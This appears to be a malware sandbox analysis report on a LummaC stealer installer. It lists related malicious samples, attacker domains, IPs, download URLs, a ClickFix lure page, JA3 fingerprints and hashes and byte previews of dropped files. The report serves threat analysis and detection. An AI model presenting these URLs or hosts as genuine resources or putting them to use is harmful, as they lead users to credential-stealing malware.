	https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005	Get hash	malicious	Unknown	Browse	jackoffjackofflilliilkillxoopoeadonline.top/drive/
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy
	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
185.161.251.21	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	'Set-up.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	'Set-up.exe	Get hash	malicious	LummaC	Browse	185.161.251.21

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.162.153
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.223.109
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	PK5pHX4Gu5.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.11.60
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
NTLGB	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	185.161.251.21
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	212.250.45.83
	sora.arm.elf	Get hash	malicious	Mirai	Browse	82.5.147.126
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	armv4l.elf	Get hash	malicious	Unknown	Browse	82.4.86.227
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	77.98.100.100

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3 185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3 185.161.251.21
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3 185.161.251.21
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	188.114.96.3 185.161.251.21
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	188.114.96.3 185.161.251.21
	random.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3 185.161.251.21
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	188.114.96.3 185.161.251.21
	davies.exe	Get hash	malicious	LummaC	Browse	188.114.96.3 185.161.251.21
	FeedStation.exe	Get hash	malicious	LummaC	Browse	188.114.96.3 185.161.251.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe	Get hash	malicious	LummaC Stealer	Browse
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse
	PortugalForum_nopump.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Full-Ver_Setup.exe, Detection: malicious, Browse Filename: random.exe, Detection: malicious, Browse Filename: HouseholdsClicking.exe, Detection: malicious, Browse Filename: DodSussex.exe, Detection: malicious, Browse Filename: DangerousMidlands.exe, Detection: malicious, Browse Filename: PortugalForum_nopump.exe, Detection: malicious, Browse Filename: CondosGold_nopump.exe, Detection: malicious, Browse Filename: PortugalForum_nopump.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\o

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	490320
Entropy (8bit):	7.999659548317771
Encrypted:	true
SSDEEP:	12288:38yGPrYyMzOdkVfYxBt9FHhXGJ9CkxBak9NdFfm:MThMzOeVfYJPtCPak9xfm
MD5:	4943DAD399D99ABCA6EFFC6EEE7AB9CA
SHA1:	7D020E039A722048E1FDC4BD4CA871211407C78A
SHA-256:	19EBE0E3C53208066368A237DC97E196F3BB27B28B5DBF16A54D76800FCEA799
SHA-512:	EF8936EE1986055E1E102FBCFAD2D9A70147A004BA616B9D47DF9F375D55B31BCB3AEBC0D28E3EFADEEABD04DE531274063B609342CFC0A70AB0233F5FD19278
Malicious:	false
Preview:	...H..j.l.....f..Rs...0.y..)n..UX....&..GNj.}.!....]Q.2..........P..U.d.C..L.....#u..#.....\...S.,.t1.l^.7..R..@[.:...MV..._M.F..r~..1.\1/...A'..H5\....od..z..O.>?.)...Y....h1W........#....a.Z..~.q.].....#.:t8lP..*.:S.......9.3.5..... ~?k..:)\|fez_.L6w.U..2...Y...d.D...&.....'Kr.'.....Z...8....&.. {..&;..'.....+1k.........g..4...RC`.u...3....Un$."C.5_...x(......B..z@..........yw.....n..J..V...`m..B.p.~E...Y.\.4a0&%.c...8........4.['..l....z.!w..;h8...t}r.....rY......g..~.9.r..V..<.E...+....UO!.!...@.2.;...I...6..\|..V\Lu3n....t_.;..P..,;81'>....$.dW..v.9Q"._.-.G..7,.Ck/.=.Gp..C...y..%..Y........vx\..'..t\|.....tE.....5...z.z.d?..Q.1....SX.W.'.Id.O.U.m.u.O.....\|..a........R.1h....<u2:>...T9.{...5.J2.`W.4.7..m.....@..&P{..j..,....f@.UL...l..@...[..j.T....{...U.q0S.z.[7.J..B..X.t<.G.....}..Nd0.R]/...q ...8A.(!........b@e.c.b....Qc-(5i.%....T.;5xg.Fe\N...0KY.&$D..G..;s..).9.G(R.4d.....)9L.<q..&..H...J%.M..#..{....2k#j.'...v.n4.6.....S,P(.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Addiction

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	6.68673862047684
Encrypted:	false
SSDEEP:	3072:YDOSpQSAU4CE0Imbi80PtCZEMnVIPPBxT/sx:YiS+SAhClbfSCOMVIPPL/sx
MD5:	EC751AE0E0A69FACBB07E0D163D61145
SHA1:	85926F24934BD459D6CD49B7E4D0AED601E673D4
SHA-256:	EC4992431B1064C382CDA3A063B124DEFDF703B72BBCE70B57162776D5215BFB
SHA-512:	7E1F0F9DF3B9AE48A13B0F8DBFA587CFD917A2C01747245F7B41654B91367DBF12162DC90A68B2E60E929572AEFB69023844031D64AEF7A95A6FAD835C0E499F
Malicious:	false
Preview:	uH..t:B...v4...u...%....=....w...;.u...v............#.....t.3.^[...........^[..U..}..t-.u.j..5.#M...x.I...u.V.........0.I.P.d...Y..^].j.h..L.."....E..0.I...Y.e...M..A....0...0.....YY.E...........3.......E..0.Y...Y.j.h..L.......E..0.....Y.e...E......HH..t........u.....L.t.Q.6...Y.E...................E..0.....Y.j.h.L..q....E..0....Y.e..j..E....0.P...YY.E..................E..0....Y.j.hh.L..&....E..0.M...Y.e...E......@H....E...........?.......E..0.e...Y..U.....E..M..E..E.E.P.u..E.P.......]..U.....E..M..E..E.E.P.u..E.P.p.....]..U.....E..M..E..E.E.P.u..E.P.......]..U.....E..M..E..E.E.P.u..E.P.......]..U..QQ.E.3.AjC.H..E....&J..E...P....E.Y.@H..L..E.f.Hl.E.f..r....E...L.....E..E..E.Pj..}....E..E..E..E..E.Pj...........]..U..}..t..u.......u..N...YY].......U..Q.E......&J.t.Q.,....E.Y.p<. ....E..p0......E..p4......E..p8......E..p(......E..p,......E..p@......E..pD......E...`.........E..E..E.Pj..2....E..E..E.Pj..q.....4..]..U..V.u..~L.t(.vL......FLY;...M.t.=..L.t..x..u.P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Advertise

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	Microsoft Cabinet archive data, 487992 bytes, 10 files, at 0x2c +A "Human" +A "Rights", ID 7971, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	487992
Entropy (8bit):	7.998535590309289
Encrypted:	true
SSDEEP:	12288:egzFzLT5hvVifcrGTXusVxgHUaDkrp0fqUf+cgKwFmm6Osle1l7:NRLTXVbGTXVVGHLYpjUf+cg/mm6OsleT
MD5:	26ACC2C2B1A4A6983C41DFD34E7C0E36
SHA1:	8A30D347CEB04855BC6B88E2A988C57E1C4F2BB0
SHA-256:	76CFD25838962190A5C14C92C53AAE0AFC6EB1122201632AA084635D59D0112B
SHA-512:	9C7F4AF8B8CE40B0C1E41784758C38C8DD5334EBA6B3AB900E44883814A569503DB326DDF5BD40A46FF052C461DC8A07D4F06D50331B6730B6B162199AA44B4E
Malicious:	false
Preview:	MSCF....8r......,...............#...#.................Z. .Human...........Z. .Rights...........Z. .Dramatically...........Z. .Surfing......`....Z. .Jam.r.........Z. .Enlarge..(..r.....Z. .Expiration.....r.....Z. .Addiction.....r.....Z. .Intensity.....ro....Z. .Stockings.u...(...CK...`.E.7...................!.M.M...0.M6..,...).(.E.QTD.Q../..".(.....9.N..;...{z.}....n5..]]]]U]U.3.Z....(.Q"..<..Wk..}..9.5..5E_jq..7Q...(x.F..o....y.fZ.......S)...dP.6....?.N......I...!..-....[6Bih..F*...J....P...C.z......7..]...]..mQ.......m......v.d...k.\|...........I.z&...;/....W......W.'...._.>.#_c.........rLs5..Y.k.....W.,....K;tu.....P.Q.\..B.....-8.!MTtL.....k..u...].....t.-.n.x....w.u.=..MHLL..k.}.'w..g..}..{......zH.....R..3..g..)Y))..!fKn...a.......Vx.0.2.\i`.l....(.q....y.=.....TT....qA0....p..G..4..'?1...>.L..M{~..U/.8../.2...^.]UU..<s........_..{...><.T....}\...R....."..K...{.....z.+W]....k..Z_....6~..//D..+....o.~....;.v..g.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cd

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	87040
Entropy (8bit):	7.997839840817489
Encrypted:	true
SSDEEP:	1536:0WiI8KhQfzD6Xk9UaQ8QAnkkJFrIMLEvH6Lcp6UDzYkWSYAUWeSdL9:38KOfiX4Q8TnkkJFrTEv64p6UDce9dL9
MD5:	763BF55FC59201A4EFF3086FA8052327
SHA1:	4E8A529293581313B9D191E42576F0B25B296879
SHA-256:	64E44026ACC84196281EEF8973AC69F1AE5DD431B841CFFF014659D040508261
SHA-512:	760ADDDB0082B666516C36610E331905116FEA37684DB175DD3868991B0CDC5BC1EE77802A6A01B6EBB5F74E42B3325D8F5EEB91191E74032C6C812AAE212C59
Malicious:	false
Preview:	...H..j.l.....f..Rs...0.y..)n..UX....&..GNj.}.!....]Q.2..........P..U.d.C..L.....#u..#.....\...S.,.t1.l^.7..R..@[.:...MV..._M.F..r~..1.\1/...A'..H5\....od..z..O.>?.)...Y....h1W........#....a.Z..~.q.].....#.:t8lP..*.:S.......9.3.5..... ~?k..:)\|fez_.L6w.U..2...Y...d.D...&.....'Kr.'.....Z...8....&.. {..&;..'.....+1k.........g..4...RC`.u...3....Un$."C.5_...x(......B..z@..........yw.....n..J..V...`m..B.p.~E...Y.\.4a0&%.c...8........4.['..l....z.!w..;h8...t}r.....rY......g..~.9.r..V..<.E...+....UO!.!...@.2.;...I...6..\|..V\Lu3n....t_.;..P..,;81'>....$.dW..v.9Q"._.-.G..7,.Ck/.=.Gp..C...y..%..Y........vx\..'..t\|.....tE.....5...z.z.d?..Q.1....SX.W.'.Id.O.U.m.u.O.....\|..a........R.1h....<u2:>...T9.{...5.J2.`W.4.7..m.....@..&P{..j..,....f@.UL...l..@...[..j.T....{...U.q0S.z.[7.J..B..X.t<.G.....}..Nd0.R]/...q ...8A.(!........b@e.c.b....Qc-(5i.%....T.;5xg.Fe\N...0KY.&$D..G..;s..).9.G(R.4d.....)9L.<q..&..H...J%.M..#..{....2k#j.'...v.n4.6.....S,P(.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dramatically

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	5.749129020498491
Encrypted:	false
SSDEEP:	1536:+vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPL:tq8QLeAg0Fuz08XvBNbjaAtsPL
MD5:	218D7026DE73B67610F14559ABD04F51
SHA1:	CAA33BB71DEF185898E3EB024132BCD45AFA5A82
SHA-256:	CB5BE80E10F2845A913BFFCD157F4E3996B3E2DCAFF08DF3DA3A1E81E59E9E8A
SHA-512:	BA6A617F0FF49E008D1606154D29B1E13C892C8067A4C07865D671B595A0697A38618B6F034C20FC69A81256B2D98B944A228DC463DACABB232F6352F2083392
Malicious:	false
Preview:	I.T.E.S.E.C.T.I.O.N...C.O.N.T.R.O.L.T.R.E.E.V.I.E.W...A.U.T.O.I.T.S.E.T.O.P.T.I.O.N...G.U.I.C.T.R.L.S.E.T.C.O.L.O.R...D.L.L.S.T.R.U.C.T.G.E.T.P.T.R...A.D.L.I.B.U.N.R.E.G.I.S.T.E.R...D.R.I.V.E.S.P.A.C.E.T.O.T.A.L...G.U.I.C.T.R.L.S.E.T.S.T.A.T.E...W.I.N.G.E.T.C.L.A.S.S.L.I.S.T...G.U.I.C.T.R.L.G.E.T.S.T.A.T.E...F.I.L.E.G.E.T.S.H.O.R.T.C.U.T...D.L.L.S.T.R.U.C.T.C.R.E.A.T.E...P.R.O.C.E.S.S.G.E.T.S.T.A.T.S...C.O.N.T.R.O.L.G.E.T.F.O.C.U.S...D.L.L.C.A.L.L.B.A.C.K.F.R.E.E...G.U.I.C.T.R.L.S.E.T.S.T.Y.L.E...F.I.L.E.R.E.A.D.T.O.A.R.R.A.Y...T.R.A.Y.I.T.E.M.S.E.T.T.E.X.T...C.O.N.T.R.O.L.L.I.S.T.V.I.E.W...T.R.A.Y.I.T.E.M.G.E.T.T.E.X.T...F.I.L.E.G.E.T.E.N.C.O.D.I.N.G...F.I.L.E.G.E.T.L.O.N.G.N.A.M.E...G.U.I.C.T.R.L.S.E.N.D.M.S.G.....S.E.N.D.K.E.E.P.A.C.T.I.V.E.....D.R.I.V.E.S.P.A.C.E.F.R.E.E.....F.I.L.E.O.P.E.N.D.I.A.L.O.G.....G.U.I.C.T.R.L.R.E.C.V.M.S.G.....C.O.N.T.R.O.L.C.O.M.M.A.N.D.....S.T.R.I.N.G.T.O.B.I.N.A.R.Y.....W.I.N.M.I.N.I.M.I.Z.E.A.L.L.....S.T.R.I.N.G.I.S.X.D.I.G.I.T.....T.R.A.Y.S.E.T.O.N.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Enlarge

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	110450
Entropy (8bit):	6.1500197135127275
Encrypted:	false
SSDEEP:	1536:p5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:p5elDWy4ZNoGmROL7F1G7ho2kOb
MD5:	D031193D834FDBBB9332090B9C5DC760
SHA1:	A897D8726BAE077ED1F26B5C2356439814AF5EF4
SHA-256:	23D9D85F41DD932AE769B71704199FCAB8082DD919719EBC5D7DD94AD48BF3EA
SHA-512:	409EDC92E74D470B40FCE81DF3C2B82E4664EBCA5207E27E2B6E0D59250E980F7E64CB812BFD42DE6B23D5C1DE3C317E41315834AECB701B1D916D3714EFDD78
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Expiration

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	6.535835523418198
Encrypted:	false
SSDEEP:	1536:N1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFD:NZg5PXPeiR6MKkjGWoUlJUPdD
MD5:	EBB80A826AF017F0DBDBF29596BBEE08
SHA1:	15E7ACDBA19592FE9977A3E59E0CD3CD311AA58B
SHA-256:	7B7F0A1BB215EAE100920EBAF001E0D732DFA0BC855686DE659E6C295F6B098E
SHA-512:	814F9E210E8E88D652FB474C0BD5991499D3F64D80FE3D9D42BCDD9152FAD478664B856EA1DEB9E38C9FFB845ABB7F7986E2BE3C705ADB89CA63DC6600AF1682
Malicious:	false
Preview:	E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Few

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	93184
Entropy (8bit):	7.998130601776158
Encrypted:	true
SSDEEP:	1536:9zTnmjI6YeEsVZZDpXLKkBdXFTYSMu3wS9CqEKX7OTfgHCQWaVnAPpseVU:xanx51OkfF0SMuAS9NEcfVAPOaU
MD5:	ED41ABAC6FCA2D4A54D3151CAC16FA82
SHA1:	8660B9D0D6384B4FFAFAC08CD4E60568E2658504
SHA-256:	9FE3BFDF7E5EC9C9EB7778A3DC460B81E83257D7D3DDD999E7F2ADB5E28F2129
SHA-512:	45D525A676BBDCB326538835C6987E06C1653C589F5EA8A43C85B6D4615DDCE90DDBD20935AB211DF4400EFF7B3989FB384B03377B53000BC40E1DCD1ECC2139
Malicious:	false
Preview:	.!<......B3[.......'.#.Z.....t.....3...4P..s...F..Mg..\|..Q.`GI....?Z...!D......o..UH........3......KN..I.V...kvD...._.fp.d>..j{.;...F...q6...c....-]Hj./.P... ...XG.u..G.?.\| B...M...g..O.V%#.p.gl...6..k.?VR..\|.I"m..#.:s..PdH..G....a.......?..t........n....k....b..e.8..1...9bRl...........m.V. F.H....M...]..qv....V.+....7P.y..g...l.SM.p.(.Z,.\..m..z-.D.=...9.(..-.Z.z.w..ku..b?q....I..R.{s.J.4&R_.2j7.ke.u.+....<.sx.Fo.c!.'j..<.-.....&=.....&......bAz..L.a.x..@.JH'.%a."Kx.x.........s0.>..1[}]]<:>$.M.U)...........W'.o.I+.../.:.Z..p........"..W...?5..d.TY...tA7...l.....%......Q.AL.........\.m.i6.^y.4..v$..N[....V..U,5..N..x.K>.My'.5R...k.=.l.K.k.'..&L.R...=I@..QQ^.N;.j:...)...y..f.h...H.6+..p>......Z...@..7Wqc#.....,l=..Qs..-..S.(.U/.J.?4\....".\|.u!.Yjt.=.......z-.S.<U...L.........._..VR<........{hwhpK%.4...@.q..3.ll..R....2<&...{...............C.N...Q.DBd....f....H.. ^.Z...........Az2H"......>A+......%:....C./....P.Cl_B...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Greensboro

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	7.998026447565102
Encrypted:	true
SSDEEP:	1536:79hBwOl7KBaE4QiUWm2kwA1Fsp0sce3JZuxZl3DvPwOcRs5E3l5b1hl:73Bw47j6iULeA1FlsceZsxZlTgT5jl
MD5:	F2B4332EF470EE68E2AA208B545211F3
SHA1:	2160C1425C809FECFE8F9CA03BBE91EE7C9FB6C4
SHA-256:	268CAD07AD728A6A69C89FD7D51051C858DEC6E2777626D70A03B48DD36C9E71
SHA-512:	9FCE7B43A1D7C9AA1290F1A7416213388001D14618B36F833F558CD5350FA80032BEF4C53276100F6C12F3A4468053D2BA68660FFEB80923CD537062A8AF3019
Malicious:	false
Preview:	..c+..J.7...j....~.,...../.L...7.M{..iT...h.N...".........&....T...h2.\@X\|.....0.VW...C....X-\|s.2R..<...j...E9w.R...9,%..Q3..L..S.../I.\.....v...ARx.teT...6..I.z'I...'s......7.."..!iF3.k+.8..x....Zy..5.....L)pd..N........p....e...H..5=,#%...f....1.s...]...C..w.a..Z.{...7.~....H..t(-.v.O....V...'.Vo..@.Ks~.ry..g.d..w.K.5...%..a......x[..'.5..._7."..w.."...:...~H@.+.h..........5../...4.a.X..sx..^..g.E....1..n...... .E?..AX.....A...$A.O]..a..s8i"....L].....>..3......>..B.K.C+y.c.C.,..j..Uy. ...}...F[.:Zb'.:y...^Z..XE.}..=...I(.6.p...?....q.X...VTk..u..oe..........1.....R..F..c.0.D....n..50{.....XA....N5{7............].'...R......>..%..kx..9...}%-....)..;... ....a@...f....W..Q.`..>6B..S8>.18..X7.6.!.n.7....p..B...w,+.'b..@O../...b.q..AXPtq2.G=....;.....>eB]....v.U.I...ZKtu-.v.F+S.....6.-1...r..B..w..\|.(..F<.........^...j.\EY.......AbH.avE..:`.=l...u..P..[\|..Y.1.....D.J1....u...b.....-"]^R........$....._D.{..sNI.c.G...+....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Human

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	4.89023702788523
Encrypted:	false
SSDEEP:	768:BKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:BKaj6iTcPAsAhxjgarB
MD5:	83E89460FC3164CCBAC0A10B69FF7460
SHA1:	57D804BC53108597D856C14464A5E5D5BB5FC20E
SHA-256:	D792B11D5D5810DB2115264456E925A9A73784FBA070AAE4F98DE8129542D77B
SHA-512:	60BA2B3AD479FE1717E45684F7DEC7A26C3FC32C911709C8AB00D9EA1C50FC7E5CCBB8C9254657354FE3A2538B6552731349D1360A39EBA6042D5EE7EF439ADE
Malicious:	false
Preview:	......................................................................................................................................................................................................................................................................................................................................................................................r.r.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r...................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Intensity

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	117760
Entropy (8bit):	6.709806767054343
Encrypted:	false
SSDEEP:	3072:fydTmRxlHS3NxrHSBRtNPnj0nEoXnmow5:f7HS3zcNPj0nEo3tW
MD5:	4FD1549A7EFAD77088B4211F622784AE
SHA1:	767275CB282EFD2BDAF710476B05533F81E8104B
SHA-256:	ED3253B2734E78DF2665987CDF316F89288E7C7FEFFAF20CCC9E675C49B3AAF3
SHA-512:	DDE528167DCD1F4B669031F304C9A9EA144947D8F2F49C8F8100F65ECBB23E23FD5098E6A96A9BFB51041174C571CBF71A807CF33DC09A8F2472201E14A095E7
Malicious:	false
Preview:	.......Y........}..........E...@..P.u.V.u..u..................E.9E.......;~\|.............}....t+..%....=....u...............................$t&..@t!..`t.......r.......v.......s.3........;E........E....E.@P.u...V.u..u..I..........S.................E.9E......;~\|..9..........}....E..t*%....=....u.............%............................L.........E.,K.......K..F\|.M.;........U..}......E.....t/..%....=....u!..G.......%..........E............u...............L.........E.,K.......K............1L..u.t..E.M.<C.F\|...;...m......F\|.].......t ;.r.;.....v..Fh.............{....E....E.@P.u...V.u..u....................V....+.;...;...f..f;F4...........<...f.G.f;F6....................%....................E.......u..............u.....$...E..u..E...w4t..........A..........2;~\|.....f.?.......x...........t.................~l................w<..r.........w...d........[..... ..R....p...........A...._....._ ..w/......... ....E...... ........../ .........(......0...................w<.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Invite

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.997402239266437
Encrypted:	true
SSDEEP:	1536:v2U7HfFKRtT3bQcdNgOq3WbdepXmmBdxvysY0ao72m5XByU+oM8:v2qfFKRtTccvgOqGkXmmBXlBXkUP5
MD5:	74CDFF214030E19F3292201B91C9FFA4
SHA1:	DC935BFD0E06B7C266DFD6E47685AA8CC07848C2
SHA-256:	99C158384EA4F7881C246B2BDBC77EACAE3CB6FB9106D5ACD0FF8C81F874CBD5
SHA-512:	ABB20F8634D1434FA124CF3035CF624F35524AAC216B3BF2CB00FC3EC027F0EA408CE6A842C3C9D857E6ECDD20A3CAF9CD95032077895BA5A485FE7EEEA66364
Malicious:	false
